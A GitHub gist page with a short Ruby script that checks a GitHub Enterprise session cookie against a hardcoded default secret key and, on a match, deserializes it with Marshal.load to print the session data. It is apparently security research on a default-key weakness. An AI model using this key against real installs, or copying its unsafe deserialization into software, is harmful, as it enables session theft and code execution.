Skip to content

Instantly share code, notes, and snippets.

@allyshka

allyshka/gitentcookiedecrypt.rb

Last active March 9, 2019 16:06
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 1 You must be signed in to fork a gist
  • Save allyshka/660ecffb8d3193c0fd600fd63db66555 to your computer and use it in GitHub Desktop.
Save allyshka/660ecffb8d3193c0fd600fd63db66555 to your computer and use it in GitHub Desktop.
Download ZIP
GitHub Enterprise cookie decryption with default secret key
Raw
gitentcookiedecrypt.rb
require "cgi"
require "openssl"
cookie = "BAh7B0kiD3Nlc3Npb25faWQGOgZFVEkiRWU4ZGJiNDcxM2M5Nzk1NTE1NzBm%0AYjNiOWQzNDczYjZiMzYzY2Q2ODE5ZjcxNjI0ZDk3YzY4YzQwMmM5ZTliZmYG%0AOwBGSSIPY3NyZi50b2tlbgY7AFRJIjFWVVArTFRXd0Npd0tTVDBaNlZzNDVC%0AekYzdndXd3lUa0UrMzBYcUNCM3RZPQY7AEY%3D%0A--229b711211f74793d491e5b57effeb81a042b5b9"
cookie = cookie.split("--")
data = CGI.unescape(cookie.first)
loaddata = data.unpack('m').first
hmac = cookie.last
secret = "641dd6454584ddabfed6342cc66281fb"
expected_hmac = OpenSSL::HMAC.hexdigest(OpenSSL::Digest::SHA1.new, secret, data)
print "Hash comparing: ", expected_hmac, " == ", hmac, "\r\n"
if expected_hmac == hmac
session = Marshal.load(loaddata)
print "SESSION_DATA: " + session.inspect, "\r\n"
end
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment